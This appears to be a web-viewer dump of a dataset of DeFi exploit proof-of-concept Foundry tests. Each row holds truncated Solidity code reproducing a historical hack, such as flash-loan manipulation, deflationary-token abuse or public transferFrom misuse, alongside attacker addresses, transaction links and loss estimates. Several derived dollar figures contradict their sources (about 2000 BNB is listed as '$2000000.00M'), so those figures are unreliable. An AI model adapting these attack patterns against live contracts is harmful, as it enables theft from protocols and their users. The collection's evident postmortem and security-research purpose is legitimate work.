// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1613507804412940289
// @TX
// https://bscscan.com/tx/0x933d19d7d822e84e34ca47ac733226367fbee0d9c0c89d88d431c4f99629d77a
interface SHOP {
... | exploit_poc | UFDao | 2023-01 | UFDao_exp.sol | null | 91d6b4397b32fabb | 2026-01-07T10:59:16.525467 | postmortems | bsc | 24,705,058 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.2 | low | UFDao Exploit (2023-01) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1614774855999844352
// https://twitter.com/BlockSecTeam/status/1614864084956254209
// @TX
// https://polygonscan.com/tx/0x0053490215baf541362f... | exploit_poc | Midas | 2023-01 | Midas_exp.sol | flash_loan | 92294ad3861d053f | 2026-01-07T10:59:16.525516 | postmortems | polygon | 38,118,347 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
payable(address(0)).transfer(address(this).balance);
balancerFlashloan();
emit log_named_decimal_uint(
"Attacker WMATIC balance after exploit", WMATIC.balanceOf(address(this)), WMATIC.decimals()
);
} | true | Unknown | 6 | medium | Midas Exploit (2023-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2000 BNB (6 BNB in this tx)
// Attacker : 0x1ae2dc57399b2f4597366c5bf4fe39859c006f99
// Attack Contract : 0x7d1e1901226e0ba389bfb1281ede859e6e48cc3d
// Vulnerable Contr... | exploit_poc | ThoreumFinance | 2023-01 | ThoreumFinance_exp.sol | null | 872c597623a26c94 | 2026-01-07T10:59:16.525607 | postmortems | bsc | 24,913,171 | ~2000 BNB (6 BNB in this tx) | 2,000,000,000,000 | null | null | null | https://bscscan.com/tx/0x3fe3a1883f0ae263a260f7d3e9b462468f4f83c2c88bb89d1dee5d7d24262b51 | null | null | true | true | false | critical | ~2000 BNB (6 BNB in this tx) | unknown | function testExploit() public {
Exploit exploit = new Exploit();
emit log_named_decimal_uint("[start] Attacker wbnb Balance", wbnb.balanceOf(exploiter), 18);
exploit.harvest();
emit log_named_decimal_uint("[End] Attacker wbnb Balance", wbnb.balanceOf(exploiter), 18);
}
}
contract Ex... | true | ~2000 BNB (6 BNB in this tx) | https://bscscan.com/tx/0x3fe3a1883f0ae263a260f7d3e9b462468f4f83c2c88bb89d1dee5d7d24262b51 | $2000000.00M | 7.05 | medium | ThoreumFinance Exploit (2023-01) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/console2.sol";
import "forge-std/Test.sol";
import "../interface.sol";
/*
Balancer STA Exploit
Vulnerability principle: The incompatibility issue of deflationary tokens(STA) on Balancer. When users exchange deflationary tokens,
the cont... | exploit_poc | Balancer_20200628 | 2020-06 | Balancer_20200628_exp.sol | null | 7d457345b708c609 | 2026-01-07T10:59:16.525677 | postmortems | ethereum | 10,355,806 | null | null | null | null | null | https://etherscan.io/tx/0x013be97768b702fe8eccef1a40544d5ecb3c1961ad5f87fee4d16fdc08c78106 | null | null | false | false | false | medium | null | unknown | function testExploit() public {
// approve
IERC20(weth).approve(dydx, type(uint256).max);
IERC20(weth).approve(address(bpool), type(uint256).max);
IERC20(sta).approve(address(bpool), type(uint256).max);
IERC20(sta).approve(pancakeV2Router, type(uint256).max);
emit log_na... | true | https://etherscan.io/tx/0x013be97768b702fe8eccef1a40544d5ecb3c1961ad5f87fee4d16fdc08c78106 | Unknown | 7 | medium | Balancer_20200628 Exploit (2020-06) | false | false | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Bancor Protocol Access Control Exploit PoC
Some of the newly deployed Bancor contracts had the 'safeTransferFrom' function public.
As a result, if any user had granted approval to these contra... | exploit_poc | Bancor | 2020-06 | Bancor_exp.sol | access_control | abd6e7917494f4fc | 2026-01-07T10:59:16.525743 | postmortems | ethereum | 10,307,563 | null | null | null | null | null | null | null | null | false | false | true | medium | null | access-control | function testsafeTransfer() public {
emit log_named_uint(
"Victim XBPToken Allowance to Bancor Contract : ", (XBPToken.allowance(victim, bancorAddress) / 1 ether)
);
emit log_named_uint("[Before Attack]Victim XBPToken Balance : ", (XBPToken.balanceOf(victim)) / 1 ether);
emit... | true | Unknown | 4.11 | low | Bancor Exploit (2020-06) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
@Analysis
https://medium.com/opyn/opyn-eth-put-exploit-post-mortem-1a009e3347a8
@Transaction
0x56de6c4bd906ee0c067a332e64966db8b1e866c7965c044163a503de6ee6552a*/
contract ContractTest is Test... | exploit_poc | Opyn | 2020-08 | Opyn_exp.sol | null | 91bc667000fa78dd | 2026-01-07T10:59:16.525784 | postmortems | unknown | 10,592,516 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function test_attack() public {
cheats.startPrank(attacker);
uint256 balBefore = usdc.balanceOf(attacker) / 1e6;
console.log("Attacker USDC balance before is ", balBefore);
console.log("------EXPLOIT-----");
//Adds ERC20 collateral, and mints new oTokens in one step
... | true | Unknown | 2.96 | low | Opyn Exploit (2020-08) | false | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface ISDF {
function burn(address, uint256) external;
function balanceOf(
address owner
) external view returns (uint256);
function approve(address spender, uint256 value) external returns (bool);
}
interf... | exploit_poc | Shadowfi | 2022-09 | Shadowfi_exp.sol | null | 6b3a6198cec875cb | 2026-01-07T10:59:16.525826 | postmortems | unknown | 20,969,095 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", WBNB.balanceOf(address(this)), 18);
address(WBNB).call{value: 0.01 ether}("");
WBNBToSDF();
SDF.burn(address(Pair), SDF.balanceOf(address(Pair)) - 1);
Pair.sync();
... | true | Unknown | 3.03 | low | Shadowfi Exploit (2022-09) | false | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IWRAP {
function withdraw(address from, address to, uint256 amount) external;
}
interface IDODO {
function flashLoan(uint256 baseAmount, uint256 quoteAmount, address assetTo, bytes calldata data) external;
funct... | exploit_poc | RADT | 2022-09 | RADT_exp.sol | flash_loan | 264146bed1455381 | 2026-01-07T10:59:16.525862 | postmortems | unknown | 21,572,418 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18);
USDT.approve(address(Router), ~uint256(0));
RADT.approve(address(Router), ~uint256(0));
IDODO(dodo).flashLoan(0, 200_000 * 1e18, address(this),... | true | Unknown | 4.28 | low | RADT Exploit (2022-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 4481 BNB (~125M US$)
// Attacker : 0x22c9736d4fc73a8fa0eb436d2ce919f5849d6fd2
// Attack Contract : 0xa35ef9fa2f5e0527cb9fbb6f9d3a24cfed948863
// Vulnerable Contract : 0x... | exploit_poc | NewFreeDAO | 2022-09 | NewFreeDAO_exp.sol | flash_loan | 2720d8d5e3f5a39e | 2026-01-07T10:59:16.525916 | postmortems | unknown | 21,140,434 | 4481 BNB (~125M US$) | 4,481,000,000,000 | null | null | null | null | null | null | true | true | true | critical | 4481 BNB (~125M US$) | flash-loan | function testExploit() public {
console.log("Flashloan 250 WBNB from DODO DLP...");
bytes memory data = abi.encode(dodo, wbnb, 250 * 1e18);
DVM(dodo).flashLoan(0, 250 * 1e18, address(this), data);
} | true | 4481 BNB (~125M US$) | $4481000.00M | 8 | high | NewFreeDAO Exploit (2022-09) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Bad Guys by RPF Business Logic Flaw Exploit PoC
The exploit was due to the missing check for "chosenAmount" in the WhiteListMint function which allowed the attacker to pass the number of NFTs h... | exploit_poc | BadGuysbyRPF | 2022-09 | BadGuysbyRPF_exp.sol | null | f56a441e2d2df6d5 | 2026-01-07T10:59:16.526031 | postmortems | ethereum | 15,460,093 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
//quick hack to enable Minting in Block#15460093
//In actual hack the Mint was live in Block#15460094
cheats.prank(owner);
RPFContract.flipPauseMinting();
console.log("[Before WhiteListMint] Attacker's Bad Guys by RPF NFT Balance: ", RPFContract.b... | true | Unknown | 3.61 | low | BadGuysbyRPF Exploit (2022-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Exploit Alert ref: https://twitter.com/blocksecteam/status/1567027459207606273?s=21&t=ZNoZgSdAuI4dJIFlMaTJeg
// Origin Attack Transaction: 0xe176bd9cfefd40dc03508e91d856bd1fe72ffc1e9260cd63502d... | exploit_poc | ZoomproFinance | 2022-09 | ZoomproFinance_exp.sol | flash_loan | cc0159d2b8782a89 | 2026-01-07T10:59:16.526078 | postmortems | unknown | 21,055,930 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", Usdt.balanceOf(address(this)), 18);
// flashloan - Brrow 3,000,000 USDT
PancakePair.swap(3_000_000_000_000_000_000_000_000, 0, address(this), new bytes(1));
emit log_named_decima... | true | Unknown | 5.12 | medium | ZoomproFinance Exploit (2022-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/**
* POC Build by
* - https://twitter.com/kayaba2002
* - https://twitter.com/eugenioclrc
*/
interface Structs {
struct Val {
uint256 value;
}
enum ActionType {
Dep... | exploit_poc | MEVbadc0de | 2022-09 | MEVbadc0de_exp.sol | null | 60b8d13a9d8a2540 | 2026-01-07T10:59:16.526139 | postmortems | unknown | 15,625,424 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("MEV Bot balance before exploit:", weth.balanceOf(MEVBOT), 18);
Structs.Info[] memory _infos = new Structs.Info[](1);
_infos[0] = Structs.Info({owner: address(this), number: 1});
Structs.ActionArgs[] memory _args = new Structs... | true | Unknown | 5 | medium | MEVbadc0de Exploit (2022-09) | false | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface TargetClaim {
function claim(
address
) external;
}
interface TargetWithdraw {
function withdrawReturnAmountByMerchant() external;
function withdrawReturnAmountByConsumer() external;
function with... | exploit_poc | Yyds | 2022-09 | Yyds_exp.sol | null | 16dd352491806d51 | 2026-01-07T10:59:16.526202 | postmortems | unknown | 21,157,025 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18);
(reserve0, reserve1,) = Pair.getReserves();
uint256 amount0Out = USDT.balanceOf(address(Pair));
Pair.swap(amount0Out - 1 * 1e18, 0, address(thi... | true | Unknown | 3.26 | low | Yyds Exploit (2022-09) | false | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IPair {
function approve(address, uint256) external;
function balanceOf(
address
) external returns (uint256);
}
interface IDPC {
function approve(address, uint256) external;
function balanceOf(
... | exploit_poc | DPC | 2022-09 | DPC_exp.sol | null | 78cdd633afacee3f | 2026-01-07T10:59:16.526249 | postmortems | unknown | 21,179,209 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.71 | low | DPC Exploit (2022-09) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Total Lost : 40085 USDT
// Attacker : 0x81c63d821b7cdf70c61009a81fef8db5949ac0c9
// Attack Contract : 0x4e77df7b9cdcecec4115e59546f3eacba095a89f
// Vulnerable Contract : https://bscscan.com/ad... | exploit_poc | BXH | 2022-09 | BXH_exp.sol | flash_loan | 2a4e1735715051ff | 2026-01-07T10:59:16.526299 | postmortems | bsc | 21,727,289 | 40085 USDT | 40,085 | null | null | https://bscscan.com/address/0x27539b1dee647b38e1b987c41c5336b1a8dce663 | null | null | null | false | false | true | medium | 40085 USDT | flash-loan | function testExploit() public {
// Before attack need deposit first
// cheat.rollFork(21665464);
// cheat.prank(0x81C63d821b7CdF70C61009A81FeF8Db5949AC0C9);
// //emit log_named_decimal_uint("[Start] VUSDT Balance Of 0x54f611135A9b88bbE23a8CF6C1310c59321F2717:", vUSDT.balanceOf(address... | true | https://bscscan.com/address/0x27539b1dee647b38e1b987c41c5336b1a8dce663 | $40.1K | 9 | high | BXH Exploit (2022-09) | true | true | false | false | ||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface MEVBot {
function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external;
}
contract ContractTest is Test {
address public _token0;
address public _token1;
IERC20 USDT = I... | exploit_poc | BNB48MEVBot | 2022-09 | BNB48MEVBot_exp.sol | null | 4f52d3507a4f9f4b | 2026-01-07T10:59:16.526375 | postmortems | unknown | 21,297,409 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18);
emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", WBNB.balanceOf(address(this)), 18);
emit log_named_decimal_uint("[Start] Att... | true | Unknown | 3.59 | low | BNB48MEVBot Exploit (2022-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://medium.com/nereus-protocol/post-mortem-flash-loan-exploit-in-single-nxusd-market-343fa32f0c6
// Refer: https://github.com/kedao/exploitDefiLabs/blob/main/src/test/Nxusd_exp... | exploit_poc | NXUSD | 2022-09 | NXUSD_exp.sol | flash_loan | 7985b988a0b53147 | 2026-01-07T10:59:16.526418 | postmortems | unknown | 19,613,451 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
USDC.approve(address(Router), type(uint256).max);
WAVAX.approve(address(Router), type(uint256).max);
// AAVE flashloan
aaveLendingPool.flashLoan(address(this), _assets, _amounts, _modes, address(this), new bytes(1), 0);
emit log_named_uint("After ... | true | Unknown | 6 | medium | NXUSD Exploit (2022-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 157.98 BNB (~44,000 US$)
// Attacker : 0x91b7f203ed71c5eccf83b40563e409d2f3531114
// Attack Contract : 0x158af3d23d96e3104bcc65b76d1a6f53d0f74ed0
// Vulnerable Contract ... | exploit_poc | ROI | 2022-09 | ROI_exp.sol | flash_loan | bfa324da015c15ca | 2026-01-07T10:59:16.526483 | postmortems | bsc | 21,143,795 | 157.98 BNB (~44,000 US$) | 157,980,000,000 | null | null | https://bscscan.com/address/0xe48b75dc1b131fd3a8364b0580f76efd04cf6e9c#code | null | null | null | true | false | true | critical | 157.98 BNB (~44,000 US$) | flash-loan | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker BNB Balance:", address(this).balance, 18);
console.log("----------------------------------------------------");
console.log("Attacker swap some BNB to ROI for attack fund...");
console.log("Before [WBNB, BUSD,... | true | 157.98 BNB (~44,000 US$) | https://bscscan.com/address/0xe48b75dc1b131fd3a8364b0580f76efd04cf6e9c#code | $157980.00M | 9 | high | ROI Exploit (2022-09) | true | true | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IERC721Receiver {
function onERC721Received(
address operator,
address from,
uint256 tokenId,
bytes calldata data
) external returns (bytes4);
}
... | exploit_poc | THB | 2022-09 | THB_exp.sol | null | 2bec26f07f8c4449 | 2026-01-07T10:59:16.526569 | postmortems | unknown | 21,785,004 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_uint("Attacker THBR balance before exploit", THBR.balanceOf(address(this)));
houseWallet.shoot{value: 0.32 ether}(randomNumber, gameId, feestate, _x, name, _add, nftcheck, dystopianCheck);
uint256 _amount = houseWallet.winners(gameId, add);
... | true | Unknown | 3.51 | low | THB Exploit (2022-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xee10553c26742bec9a4761fd717642d19012bab1704cbced048425070ee21a8a?line=2
// Profit : ~182K USD
// REASON : Business Logic Flaw
// Sandwitch atta... | exploit_poc | ATM | 2024-04 | ATM_exp.sol | null | 3e3556831795db22 | 2026-01-07T10:59:16.526619 | postmortems | unknown | 37,483,300 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.94 | low | ATM Exploit (2024-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "src/test/interface.sol";
// @KeyInfo - Total Lost : 181K
// Attacker : https://arbiscan.io/address/0x1abe06f451e2d569b3e9123baf33b51f68878656
// Attack Contract : https://arbiscan.io/address/0xd775fd7b76424a553e4adce6... | exploit_poc | Yield | 2024-04 | Yield_exp.sol | flash_loan | f85c1993c0b3d94e | 2026-01-07T10:59:16.526666 | postmortems | arbitrum | null | 181K | 181,000 | https://arbiscan.io/address/0x1abe06f451e2d569b3e9123baf33b51f68878656 | https://arbiscan.io/address/0xd775fd7b76424a553e4adce6c2f99be419ce8d41 | https://arbiscan.io/address/0x3b4ffd93ce5fcf97e61aa8275ec241c76cc01a47 | https://arbiscan.io/tx/0x6caa65b3fc5c8d4c7104574c3a15cd6208f742f9ada7d81ba027b20473137705 | null | null | true | true | true | high | 181K | flash-loan | function testExploit() public {
// Implement exploit code here
address[] memory tokens = new address[](1);
tokens[0] = address(USDC);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 400_000 * 1e6;
bytes memory userData = "";
Balancer.flashLoan(address(th... | true | 181K | https://arbiscan.io/address/0x1abe06f451e2d569b3e9123baf33b51f68878656 | https://arbiscan.io/address/0xd775fd7b76424a553e4adce6c2f99be419ce8d41 | https://arbiscan.io/address/0x3b4ffd93ce5fcf97e61aa8275ec241c76cc01a47 | https://arbiscan.io/tx/0x6caa65b3fc5c8d4c7104574c3a15cd6208f742f9ada7d81ba027b20473137705 | $181.0K | 8.83 | high | Yield Exploit (2024-04) | true | true | true | false | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~0.3 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0x6fb7f8e9eb09d6ae17dbe82b2b42f46f64fb9c3197438b68ecf03e832d5fc791
// Attacker : https://etherscan.io/address/0x676c3262e8f0fba0031a93ea74ff801b99ac1... | exploit_poc | HoppyFrogERC | 2024-04 | HoppyFrogERC_exp.sol | null | 0bb815a9dda687ec | 2026-01-07T10:59:16.526717 | postmortems | ethereum | 19,570,744 | ~0.3 ETH | 0.3 | https://etherscan.io/address/0x676c3262e8f0fba0031a93ea74ff801b99ac177b | https://etherscan.io/address/0xc976ed4b25e1e7019ff34fb54f4e63b1550b70c3 | null | null | null | null | true | false | false | low | ~0.3 ETH | unknown | false | https://etherscan.io/address/0x676c3262e8f0fba0031a93ea74ff801b99ac177b | https://etherscan.io/address/0xc976ed4b25e1e7019ff34fb54f4e63b1550b70c3 | $0 | 3.39 | low | HoppyFrogERC Exploit (2024-04) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @Analysis
// https://twitter.com/Phalcon_xyz/status/1782966566042181957
// @TX
// https://app.blocksec.com/explorer/tx/bsc/0x49ca5e188c538b4f2efb45552f13309cc0dd1f3592eee54decfc9da54620c2ec
inte... | exploit_poc | YIEDL | 2024-04 | YIEDL_exp.sol | null | 92f37ab3a57eeeee | 2026-01-07T10:59:16.526764 | postmortems | unknown | 38,126,753 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
bytes[] memory dataList = new bytes[](11); //@note mock data list - unoswapTo
uint256[] memory pools = new uint256[](1);
pools[0] = uint256(
28_948_022_309_329_048_857_350_594_136_651_893_637_891_169_795_467_361_725_136_627_244_723_734_772_827
... | true | Unknown | 3.64 | low | YIEDL Exploit (2024-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens))
// Attacker : https://etherscan.io/address/... | exploit_poc | XBridge | 2024-04 | XBridge_exp.sol | null | 3061e72a365cabcc | 2026-01-07T10:59:16.526810 | postmortems | ethereum | 19,723,701 | ~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens)) | 1,600,000 | https://etherscan.io/address/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7 | null | https://etherscan.io/address/0x354cca2f55dde182d36fe34d673430e226a3cb8c#code | null | null | null | true | true | false | critical | ~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens)) | unknown | function testExploit() public {
// First TX
deal(address(this), 0.15 ether);
emit log_named_decimal_uint("Exploiter STC balance before attack", STC.balanceOf(address(this)), 9);
IXbridge.tokenInfo memory base = IXbridge.tokenInfo(address(STC), 85_936);
IXbridge.tokenInfo memory ... | true | ~$1.6M(https://debank.com/profile/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7, >200k USD(plus a lot of STC, SRLTY, Mazi tokens)) | https://etherscan.io/address/0x0cfc28d16d07219249c6d6d6ae24e7132ee4caa7 | https://etherscan.io/address/0x354cca2f55dde182d36fe34d673430e226a3cb8c#code | $1.60M | 6.04 | medium | XBridge Exploit (2024-04) | true | true | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xd03702e17171a32464ce748b8797008d59e2dbcecd3b3847d5138414566c886d
// Profit : ~ 28K USD
// REASON : business logic flaw XD transfer to pair won'... | exploit_poc | UPS | 2024-04 | UPS_exp.sol | null | ae5d1a76694ad559 | 2026-01-07T10:59:16.526859 | postmortems | unknown | 37,680,754 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.61 | low | UPS Exploit (2024-04) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~14 BNB
// Attacker : https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c
// Attack Contract : https://bscscan.com/address/0xde521fbbbb0dbcfa57325a989... | exploit_poc | FIL314 | 2024-04 | FIL314_exp.sol | null | f80e4da09db3bf73 | 2026-01-07T10:59:16.526903 | postmortems | bsc | null | ~14 BNB | 14,000,000,000 | https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c | https://bscscan.com/address/0xde521fbbbb0dbcfa57325a9896c34941f23e96a0 | https://bscscan.com/address/0xe8a290c6fc6fa6c0b79c9cfae1878d195aeb59af | https://bscscan.com/tx/0x9f2eb13417190e5139d57821422fc99bced025f24452a8b31f7d68133c9b0a6c | null | null | true | false | false | critical | ~14 BNB | unknown | function testExploit() public {
// Implement exploit code here
emit log_named_decimal_uint(" Attacker BNB Balance Before exploit", address(this).balance, 18);
// buy FIL314 token
address(FIL314).call{value: 0.05 ether}("");
// deflate the token
for (uint256 i = 0; i < 600... | true | ~14 BNB | https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c | https://bscscan.com/address/0xde521fbbbb0dbcfa57325a9896c34941f23e96a0 | https://bscscan.com/address/0xe8a290c6fc6fa6c0b79c9cfae1878d195aeb59af | https://bscscan.com/tx/0x9f2eb13417190e5139d57821422fc99bced025f24452a8b31f7d68133c9b0a6c | $14000.00M | 6.98 | medium | FIL314 Exploit (2024-04) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 48M USD
// Attacker : https://etherscan.io/address/0xDed2b1a426E1b7d415A40Bcad44e98F47181dda2
// Attack Contract : https://etherscan.io/address/0xC793113F1548B97E37c409f39... | exploit_poc | HedgeyFinance | 2024-04 | HedgeyFinance_exp.sol | flash_loan | 53b197bc763ff25a | 2026-01-07T10:59:16.526944 | postmortems | ethereum | null | 48M USD | 48,000,000 | https://etherscan.io/address/0xDed2b1a426E1b7d415A40Bcad44e98F47181dda2 | https://etherscan.io/address/0xC793113F1548B97E37c409f39244EE44241bF2b3 | https://etherscan.io/address/0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511 | https://etherscan.io/tx/0x2606d459a50ca4920722a111745c2eeced1d8a01ff25ee762e22d5d4b1595739 | https://medium.com/@CUBE3AI/hedgey-finance-hack-detected-by-cube3-ai-minutes-before-exploit-1f500e7052d4 | https://twitter.com/Cube3AI/status/1781294512716820918 | true | true | true | critical | 48M USD | flash-loan | function testExploit() public {
deal(address(this), 0 ether);
emit log_named_decimal_uint("Attacker USDC balance before exploit", address(this).balance, 18);
address[] memory tokens = new address[](1);
tokens[0] = address(USDC);
uint256[] memory amounts = new uint256[](1);
... | true | 48M USD | https://etherscan.io/address/0xDed2b1a426E1b7d415A40Bcad44e98F47181dda2 | https://etherscan.io/address/0xC793113F1548B97E37c409f39244EE44241bF2b3 | https://etherscan.io/address/0xBc452fdC8F851d7c5B72e1Fe74DFB63bb793D511 | https://etherscan.io/tx/0x2606d459a50ca4920722a111745c2eeced1d8a01ff25ee762e22d5d4b1595739 | https://medium.com/@CUBE3AI/hedgey-finance-hack-detected-by-cube3-ai-minutes-before-exploit-1f500e7052d4 | https://twitter.com/Cube3AI/status/1781294512716820918 | $48.00M | 9.24 | high | HedgeyFinance Exploit (2024-04) | true | true | true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.